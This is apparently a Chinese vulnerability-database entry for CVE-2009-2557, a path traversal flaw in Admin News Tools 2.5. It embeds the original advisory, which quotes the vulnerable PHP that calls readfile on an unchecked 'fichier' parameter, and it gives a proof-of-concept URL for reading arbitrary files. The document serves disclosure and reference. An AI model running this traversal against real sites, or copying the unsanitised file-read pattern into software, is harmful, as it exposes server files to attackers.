https://www.exploit-db.com/exploits/9153
https://www.securityfocus.com/bid/43567
https://cxsecurity.com/issue/WLB-2009070029
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200907-308
Admin News Tools system/download.php目录遍历漏洞






漏洞ID | 1118119 | 漏洞类型 | 路径遍历 |
发布时间 | 2009-07-15 | 更新时间 | 2009-07-15 |
![]() |
CVE-2009-2557 | ![]() |
CNNVD-200907-308 |
漏洞平台 | PHP | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
AdminNewsTools脚本system/download.php存在目录遍历漏洞。远程攻击者能通过fichier参数(..)读取任意的文件。
|漏洞EXP
######################### Securitylab.ir ########################
# Application Info:
# Name: Admin News Tools
# Version: 2.5
# Website: http://www.adminnewstools.fr.nf
# Download: http://www.adminnewstools.fr.nf/zip/ANT-2.5.zip
#################################################################
# Discoverd By: Securitylab.ir
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Remote File Download Vulnerability
# Risk: Medium
#===========================================================
# Download.php
# header('Content-Disposition: attachment; filename=' . basename ($_GET['fichier']));
# readfile($_GET['fichier']);
# }
#
# http://www.site.com/news/system/download.php?fichier=./../up.php
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################
# milw0rm.com [2009-07-15]
|受影响的产品
Admin News Tools Admin News Tools 2.5
|参考资料
来源:BUGTRAQ
名称:20090715AdminNewsTools2.5RemoteFileDownloadVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/504949/100/0/threaded
来源:MILW0RM
名称:9153
链接:http://www.milw0rm.com/exploits/9153
来源:SECUNIA
名称:35842
链接:http://secunia.com/advisories/35842
来源:OSVDB
名称:55856
链接:http://osvdb.org/55856
检索漏洞
开始时间
结束时间